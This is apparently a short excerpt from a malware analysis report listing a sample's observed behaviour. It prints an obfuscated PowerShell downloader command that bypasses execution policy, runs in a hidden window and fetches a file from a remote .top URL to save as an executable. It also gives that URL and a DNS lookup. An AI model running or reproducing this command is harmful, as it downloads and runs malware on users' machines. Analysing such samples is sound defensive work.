Technical Information
- http://sutraponef.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWErshEl^L^.eX^E -ExeCu^T^Ionpo^l^Icy bYp^Ass^ ^-N^OpRoFI^L^e^ -w^IN^DOw^sTyLE HidDe^N ^(^nEW-^o^BjEct^ ^SYS^Tem^.N^eT^.webc^L^IEn^T^).D^Ow^nl^OA^d^fIl^E(^'http://sutraponef.to...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pOWErshEl^L^.eX^E -ExeCu^T^Ionpo^l^Icy bYp^Ass^ ^-N^OpRoFI^L^e^ -w^IN^DOw^sTyLE HidDe^N ^(^nEW-^o^BjEct^ ^SYS^Tem^.N^eT^.webc^L^IEn^T^).D^Ow^nl^OA^d^fIl^E(^'http://sutraponef.to...' (with hidden window)